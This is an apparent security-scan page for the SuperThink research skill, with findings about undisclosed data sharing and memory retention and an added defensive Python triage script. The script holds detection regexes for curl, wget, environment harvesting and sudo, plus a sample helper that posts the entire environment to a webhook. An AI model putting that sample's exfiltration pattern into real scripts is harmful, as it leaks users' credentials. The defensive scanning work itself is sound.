SuperThink

Security checks across malware telemetry and agentic risk

Overview

SuperThink is a disclosed research automation skill; its main risks are expected data sharing, cost, local retention, and optional notifications rather than hidden behavior.

Use a dedicated Anthropic API key if possible, expect API charges, and do not run sensitive research unless you are comfortable sending the topic and generated content to Anthropic. Leave webhook and Telegram variables unset unless you trust the destination, review any generated helper scripts before running them, and delete local outputs or memory notes when retention is not desired.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (4)

Description-Behavior Mismatch
Severity: Medium; confidence: 94%

Finding: The skill is presented as a fully automatic research pipeline, but the supporting scripts are not actually part of the skill; the agent is instructed to implement them and perform environment setup. That expands the skill's effective scope from research orchestration into arbitrary code generation and local system modification, increasing the chance of unsafe file writes, insecure API key handling, or execution of unreviewed support code.

Context-Inappropriate Capability
Severity: Low; confidence: 81%

Finding: The instruction to update persistent memory/notes with topic slug, date, and key findings introduces unnecessary long-term retention of user-derived research data outside the primary output path. This creates avoidable privacy and data-minimization risk, especially if research topics include sensitive business, legal, or strategic information.

Missing User Warnings
Severity: Medium; confidence: 96%

Finding: The skill sends user-supplied topic, scope, and generated documents to external services, including Anthropic and optional notification endpoints, but it does not clearly warn users about that data flow. In a deep research workflow, the transmitted content may contain confidential strategy, legal, financial, or product information, so omission of an explicit disclosure materially increases privacy and compliance risk.

Missing User Warnings
Severity: Medium; confidence: 83%

Finding: The spec encourages optional webhook and Telegram notifications but does not warn that job descriptions, result paths, and counts may be transmitted to third-party services. In the context of a research pipeline, job metadata can reveal sensitive topics, internal workflow details, or filesystem structure, creating a real data-leakage risk if operators enable these channels without understanding the exposure.
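The Overview asks operators to leave the webhook and Telegram variables unset unless the destination is trusted and to review any agent-generated helper script before running it; findings 1 and 4 above explain why (unreviewed support code, job metadata leaving the machine). The pre-run check below is an added example written for this page, not code from SuperThink or SkillSpector. The page does not name the notification variables or the helper scripts, so the variable-name fragments, the detection regexes, and the two sample scripts are constructed assumptions; adjust them to the actual skill once it is installed.

```python
"""Pre-run triage for an agent-generated research skill (added example).

Two checks: (1) which notification-style environment variables are set,
and (2) a line-level scan of a generated helper script for the behaviours
the SkillSpector categories describe: external transmission, whole-environment
harvesting, file system enumeration, and privileged execution.
"""
import os
import re
from typing import Dict, List, Tuple

# Assumed name fragments: the real variable names are not given on the page.
NOTIFY_PATTERNS = re.compile(r"WEBHOOK|TELEGRAM|SLACK|DISCORD", re.IGNORECASE)

# (category, regex) pairs; categories mirror the SkillSpector pattern list.
# Regexes are deliberately coarse: this is triage before a human review, not a sandbox.
SCRIPT_RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("external transmission",
     re.compile(r"\b(requests\.(post|put|get)|urllib\.request|httpx\.|curl\s|wget\s)")),
    ("env variable harvesting",  # reading the whole environment, not a single key
     re.compile(r"dict\(os\.environ\)|os\.environ\.(items|copy|keys|values)\(")),
    ("file system enumeration",
     re.compile(r"\b(os\.walk|glob\.glob|Path\([^)]*\)\.rglob)\b")),
    ("privileged execution",
     re.compile(r"\bsudo\b|os\.setuid|subprocess\.[a-z_]+\([^)]*sudo")),
]


def notification_channels_set(env: Dict[str, str]) -> List[str]:
    """Return the names of set, non-empty variables that look like notification endpoints."""
    return sorted(k for k, v in env.items() if NOTIFY_PATTERNS.search(k) and v.strip())


def triage_script(source: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, category, line) for every rule hit.

    Text after '#' is ignored so that explanatory comments do not trigger hits;
    this is a naive comment strip and will also cut strings containing '#'.
    """
    hits: List[Tuple[int, str, str]] = []
    for no, line in enumerate(source.splitlines(), 1):
        code = line.split("#", 1)[0]
        for category, rx in SCRIPT_RULES:
            if rx.search(code):
                hits.append((no, category, line.strip()))
    return hits


def should_run(env: Dict[str, str], source: str,
               allow_notifications: bool = False) -> Tuple[bool, List[str]]:
    """Gate a run: refuse when notification channels are configured but not explicitly
    allowed, or when the helper script transmits data, harvests the environment, or
    escalates privilege. Enumerating the output directory alone is not blocked, since a
    research pipeline that writes local outputs legitimately lists files."""
    reasons: List[str] = []
    chans = notification_channels_set(env)
    if chans and not allow_notifications:
        reasons.append("notification channels configured: " + ", ".join(chans))
    for no, category, line in triage_script(source):
        if category != "file system enumeration":
            reasons.append(f"line {no}: {category}: {line}")
    return (not reasons, reasons)


# Constructed sample inputs; not taken from the skill.
SAMPLE_ENV = {
    "ANTHROPIC_API_KEY": "sk-ant-placeholder",
    "WEBHOOK_URL": "https://hooks.example.invalid/abc",
    "TELEGRAM_BOT_TOKEN": "",  # present but empty: treated as unset
}

SAMPLE_SCRIPT = '''\
import os, json, requests
ANTHROPIC_API_KEY = os.environ.get("ANTHROPIC_API_KEY")  # single read: expected
def notify(job):
    # leaks job metadata to whatever the webhook points at
    requests.post(os.environ["WEBHOOK_URL"], json={"job": job, "env": dict(os.environ)})
'''

CLEAN_SCRIPT = '''\
import os, pathlib
API_KEY = os.environ.get("ANTHROPIC_API_KEY")
out = pathlib.Path("research") / "output.md"
out.write_text("...")
'''

if __name__ == "__main__":
    # Run against the real process environment and a script path given on the command line.
    import sys
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SCRIPT
    env = dict(os.environ) if len(sys.argv) > 1 else SAMPLE_ENV
    ok, reasons = should_run(env, src)
    print("OK to run" if ok else "BLOCKED:\n  " + "\n  ".join(reasons))
```

Run it with the path of a generated helper script as the first argument to check the real environment and that script; with no argument it evaluates the constructed samples and blocks, reporting the configured webhook variable and the two hits on the `requests.post` line. A block here is a prompt for the human review the Overview calls for, not a verdict: the regexes catch the obvious shapes of each category and nothing more.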

VirusTotal

0 of 65 VirusTotal vendors flagged this skill; all 65 reported it clean.